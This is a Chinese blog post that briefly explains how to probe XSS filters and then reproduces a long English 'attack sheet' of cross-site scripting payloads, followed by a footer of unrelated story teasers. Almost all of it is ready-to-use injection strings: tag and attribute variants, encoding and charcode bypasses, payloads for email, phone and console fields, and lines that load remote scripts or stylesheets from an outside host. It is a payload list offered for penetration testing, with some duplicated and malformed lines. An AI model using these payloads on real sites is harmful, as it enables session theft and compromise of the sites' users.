XSS Payload

XSS 重要的是根据输出来判断过滤器的规则,F12,构造自己的XSS Payload,分割,关闭括号,错误后判断过滤规则,寻找绕过

1.最简单:
<script>alert(1)</script>

2.简单URL编码:
%22><img src=1 onerror =alert(/XSS/);>

3.过滤<,>
javascript:alert(1)
"onmouseover="alert(1)

定义和用法
onmouseover 事件会在鼠标指针移动到指定的对象上时发生。
语法

onmouseover="alert(1)"

4.跳出
view plaincopyprint onmouseover=alert(1)

常用的payloads:
<img src=1onmouseover=alert(1)>
<a herf=1onload=alert(1)>xx</a>
<body/onhashchange=alert(1)><ahref=#>clickit (当锚出现变化时触发弹框)
<objectdata=”data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3QuY24vUkd1V0REUz48L3NjcmlwdD4=”></object>
“><svg/onload=alert(/1/)>
Input标签xss(autofocus自动触发,注意属性hidden时,无法触发)
112" name=javascript:alert(1)autofocus onfocus=location=this.name
112" name=javascript:alert1autofocus onfocus=location=this.name

https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html

Note: This is a technical attack sheet for cross site penetrationtests.

Cross Site Scripting Strings with TAG:

<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
<SCRIPT>document.cookie=true;</SCRIPT>
<IMG SRC="jav ascript:document.cookie=true;">
<IMG SRC="javascript:document.cookie=true;">
<IMG SRC=" javascript:document.cookie=true;">
<BODY onload!#$%&()~+-_.,:;?@[/|]^`=document.cookie=true;>
<SCRIPT>document.cookie=true;//<</SCRIPT>
<SCRIPT <B>document.cookie=true;</SCRIPT>
<IMG SRC="javascript:document.cookie=true;">
<iframe src="javascript:document.cookie=true;>
<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
<BODY BACKGROUND="javascript:document.cookie=true;">
<BODY ONLOAD=document.cookie=true;>
<IMG DYNSRC="javascript:document.cookie=true;">
<IMG LOWSRC="javascript:document.cookie=true;">
<BGSOUND SRC="javascript:document.cookie=true;">
<BR SIZE="&{document.cookie=true}">
<LAYER SRC="javascript:document.cookie=true;"></LAYER>
<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
¼script¾document.cookie=true;¼/script¾
<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
<TABLE BACKGROUND="javascript:document.cookie=true;">
<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
<DIV STYLE="background-image: url(�javascript:document.cookie=true;)">
<DIV STYLE="width: expression(document.cookie=true);">
<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
<IMG STYLE="CrossSiteScripting:expr/
CrossSiteScripting/ession(document.cookie=true)">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
exp/
<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'>
<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
<SCRIPT>document.cookie=true;</SCRIPT>
<BASE HREF="javascript:document.cookie=true;//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
<a href="javascript#document.cookie=true;">
<div onmouseover="document.cookie=true;">
![](javascript:document.cookie=true;)
![](javascript:document.cookie=true;)
<input type="image" dynsrc="javascript:document.cookie=true;">
<bgsound src="javascript:document.cookie=true;">
&<script>document.cookie=true;</script>
&{document.cookie=true;};
<img src=&{document.cookie=true;};>
<link rel="stylesheet" href="javascript:document.cookie=true;">



<a href="about:<script>document.cookie=true;</script>">
<body onload="document.cookie=true;">
<div style="background-image: url(javascript:document.cookie=true;);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.cookie=true;);">
<style type="text/javascript">document.cookie=true;</style>
<object classid="clsid:..." codebase="javascript:document.cookie=true;">
<style></script>
<<script>document.cookie=true;</script>
<script>document.cookie=true;//--></script>
<script>document.cookie=true;</script>

<img src="blah>" onmouseover="document.cookie=true;">
<xml src="javascript:document.cookie=true;">
<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with close TAG:

"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
"<SCRIPT>document.cookie=true;</SCRIPT>
"<IMG SRC="jav ascript:document.cookie=true;">
"<IMG SRC="javascript:document.cookie=true;">
"<IMG SRC=" � javascript:document.cookie=true;">
"<BODY onload!#$%&()~+-_.,:;?@[/|]^`=document.cookie=true;>
"<SCRIPT>document.cookie=true;//<</SCRIPT>
"<SCRIPT <B>document.cookie=true;</SCRIPT>
"<IMG SRC="javascript:document.cookie=true;">
"<iframe src="javascript:document.cookie=true;>
"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
"<BODY BACKGROUND="javascript:document.cookie=true;">
"<BODY ONLOAD=document.cookie=true;>
"<IMG DYNSRC="javascript:document.cookie=true;">
"<IMG LOWSRC="javascript:document.cookie=true;">
"<BGSOUND SRC="javascript:document.cookie=true;">
"<BR SIZE="&{document.cookie=true}">
"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
"¼script¾document.cookie=true;¼/script¾
"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
"<TABLE BACKGROUND="javascript:document.cookie=true;">
"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
"<DIV STYLE="background-image: url(�javascript:document.cookie=true;)">
"<DIV STYLE="width: expression(document.cookie=true);">
"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
"<IMG STYLE="CrossSiteScripting:expr/
CrossSiteScripting/ession(document.cookie=true)">
"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
"exp/
<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'>
"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
"<SCRIPT>document.cookie=true;</SCRIPT>
"<BASE HREF="javascript:document.cookie=true;//">
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
"<a href="javascript#document.cookie=true;">
"<div onmouseover="document.cookie=true;">
"![](javascript:document.cookie=true;)
"![](javascript:document.cookie=true;)
"<input type="image" dynsrc="javascript:document.cookie=true;">
"<bgsound src="javascript:document.cookie=true;">
"&<script>document.cookie=true;</script>
"&{document.cookie=true;};
"<img src=&{document.cookie=true;};>
"<link rel="stylesheet" href="javascript:document.cookie=true;">
"


"

"<a href="about:<script>document.cookie=true;</script>">
"<body onload="document.cookie=true;">
"<div style="background-image: url(javascript:document.cookie=true;);">
"<div style="behaviour: url([link to code]);">
"<div style="binding: url([link to code]);">
"<div style="width: expression(document.cookie=true;);">
"<style type="text/javascript">document.cookie=true;</style>
"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
"<style></script>
"<<script>document.cookie=true;</script>
"<script>document.cookie=true;//--></script>
"<script>document.cookie=true;</script>
"

"<img src="blah>" onmouseover="document.cookie=true;">
"<xml src="javascript:document.cookie=true;">
"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with negative value & TAG:
-1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
-1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<IMG SRC="jav ascript:document.cookie=true;">
-1<IMG SRC="javascript:document.cookie=true;">
-1<IMG SRC=" � javascript:document.cookie=true;">
-1<BODY onload!#$%&()~+-_.,:;?@[/|]^`=document.cookie=true;>
-1<SCRIPT>document.cookie=true;//<</SCRIPT>
-1<SCRIPT <B>document.cookie=true;</SCRIPT>
-1<IMG SRC="javascript:document.cookie=true;">
-1<iframe src="javascript:document.cookie=true;>
-1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
-1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
-1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
-1<BODY BACKGROUND="javascript:document.cookie=true;">
-1<BODY ONLOAD=document.cookie=true;>
-1<IMG DYNSRC="javascript:document.cookie=true;">
-1<IMG LOWSRC="javascript:document.cookie=true;">
-1<BGSOUND SRC="javascript:document.cookie=true;">
-1<BR SIZE="&{document.cookie=true}">
-1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
-1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
-1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
-1¼script¾document.cookie=true;¼/script¾
-1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
-1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
-1<TABLE BACKGROUND="javascript:document.cookie=true;">
-1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
-1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
-1<DIV STYLE="background-image: url(�javascript:document.cookie=true;)">
-1<DIV STYLE="width: expression(document.cookie=true);">
-1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
-1<IMG STYLE="CrossSiteScripting:expr/
CrossSiteScripting/ession(document.cookie=true)">
-1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
-1exp/
<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting////pression(document.cookie=true)'>
-1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
-1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
-1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
-1<SCRIPT>document.cookie=true;</SCRIPT>
-1<BASE HREF="javascript:document.cookie=true;//">
-1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
-1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
-1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
-1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
-1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
-1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
-1<a href="javascript#document.cookie=true;">
-1<div onmouseover="document.cookie=true;">
-1![](javascript:document.cookie=true;)
-1![](javascript:document.cookie=true;)
-1<input type="image" dynsrc="javascript:document.cookie=true;">
-1<bgsound src="javascript:document.cookie=true;">
-1&<script>document.cookie=true;</script>
-1&{document.cookie=true;};
-1<img src=&{document.cookie=true;};>
-1<link rel="stylesheet" href="javascript:document.cookie=true;">
-1


-1

-1<a href="about:<script>document.cookie=true;</script>">
-1<body onload="document.cookie=true;">
-1<div style="background-image: url(javascript:document.cookie=true;);">
-1<div style="behaviour: url([link to code]);">
-1<div style="binding: url([link to code]);">
-1<div style="width: expression(document.cookie=true;);">
-1<style type="text/javascript">document.cookie=true;</style>
-1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
-1<style></script>
-1<<script>document.cookie=true;</script>
-1<script>document.cookie=true;//--></script>
-1<script>document.cookie=true;</script>
-1

-1<img src="blah>" onmouseover="document.cookie=true;">
-1<xml src="javascript:document.cookie=true;">
-1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
-1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings Restriction Bypass Mail:

"<iframe src=http://vulnerability-lab.com/>@gmail.com
"<script>alert(document.cookie)</script><div style="1@gmail.com
"<script>alert(document.cookie)</script>@gmail.com

<iframe src=http://vulnerability-lab.com/>@gmail.com
<script>alert(document.cookie)</script><div style="1@gmail.com
<script>alert(document.cookie)</script>@gmail.com

Cross Site Scripting Strings Restriction Bypass Phone:
+49/>"<iframe src=http://vulnerability-lab.com>1337
"><iframe src='' onload=alert('mphone')>
<iframe src=http://vulnerability-lab.com>1337+1

Cross Site Scripting Strings Restriction Bypass Obfuscation

“<ScriPt>ALeRt("VlAb")</scriPt>
"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>

Cross Site Scripting Strings Restriction Bypass String to Charcode

<html><body>
<button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,
101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,1
10,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:fr
om.Char.Code</button></body></html>

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
'';!--"<CrossSiteScripting>=&{()}

Cross Site Scripting Strings Restriction Bypass encoded frame url

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
%73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
%73%63%72%69%70%74%3E

Cross Site Scripting Strings via Console:
set vlan name 1337 <script>alert(document.cookie)</script>
set system name <iframe src=http://www.vulnerability-lab.com>
set system location "><iframe src=a onload=alert("VL") <
set system contact <script>alert('VL')</script>

insert <script>alert(document.cookie)</script>
add
add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com

add topic <iframe src=http://www.vulnerability-lab.com>
add name <script>alert('VL')</script>

perl -e 'print "<IMG SRC=java\0script:alert("CrossSiteScripting")>";' > out
perl -e 'print "<SCR\0IPT>alert("CrossSiteScripting")</SCR\0IPT>";' > out

Cross Site Scripting Strings on per line validation applications:

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
V
L
A
B
'
)
"

Cross Site Scripting Strings Embed:

<EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Cross Site Scripting Strings Action Script:

   <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
       <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
             <param name="quality" value="high" />
             <param name="scale" value="noscale" />
             <param name="salign" value="LT" />
   <param name="allowScriptAccess" value="always" />
             <param name="menu" value="false" />
        </object>

<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
<<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
<SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
<SCRIPT SRC=//vulnerability-lab.com/.js>
<SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
<SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT a=> SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
</TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>

<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=javascript:alert('CrossSiteScripting')>
<IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
<IMG SRC=javascript:alert("CrossSiteScripting")>
<IMG SRC=javascript:alert("RM'CrossSiteScripting'")>
<IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC="jav ascript:alert('CrossSiteScripting');">
<IMG SRC="jav ascript:alert('CrossSiteScripting');">
<IMG SRC="jav
ascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting');">
<IMG SRC=" � javascript:alert('CrossSiteScripting');">
<IMG SRC="javascript:alert('CrossSiteScripting')"
<IMG DYNSRC="javascript:alert('CrossSiteScripting')">
<IMG LOWSRC="javascript:alert('CrossSiteScripting')">
<IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
<META HTTP-EQUIV="Link" Content="http://vulnerability-lab.com/CrossSiteScripting.css; REL=stylesheet">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-

<OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>

<STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
<STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
<STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
<STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
<STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
<STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>

<DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(�javascript:alert('CrossSiteScripting'))">
<DIV STYLE="width: expression(alert('CrossSiteScripting'));">

<LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
<LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">

<BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
<BODY ONLOAD=alert('CrossSiteScripting')>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("CrossSiteScripting")>
<iframe src=http://vulnerability-lab.com/index.html <

<TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
<TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">

<BGSOUND SRC="javascript:alert('CrossSiteScripting');">
<BR SIZE="&{alert('CrossSiteScripting')}">

<A HREF="http://server.com/">CrossSiteScripting</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
<A HREF="http://1113982867/">CrossSiteScripting</A>
<A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>

<BASE HREF="javascript:alert('CrossSiteScripting');//">

";alert('CrossSiteScripting');//

<INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">

<CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">

¼script¾alert(¢CrossSiteScripting¢)¼/script¾

<IMG STYLE="CrossSiteScripting:expr/CrossSiteScripting/ession(alert('CrossSiteScripting'))">
<CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//"); CrossSiteScripting:ex/CrossSiteScripting///*/pression(alert("CrossSiteScripting"))'>

a="get";
b="URL("";
c="javascript:";
d="alert('CrossSiteScripting');")";
eval(v+l+a+b);

<HTML xmlns:CrossSiteScripting>
<?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
<CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="CrossSiteScripting"><I><B><IMG SRC="javascript:alert('CrossSiteScripting')"></B></I></XML>
<SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

<XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
</BODY></HTML>

<SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>

<? echo('<SCR)';
echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>

<IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser

%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

<iframe src=http://test.de>

&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62

PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 210,914评论 6 490
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 89,935评论 2 383
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 156,531评论 0 345
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,309评论 1 282
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,381评论 5 384
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,730评论 1 289
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,882评论 3 404
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,643评论 0 266
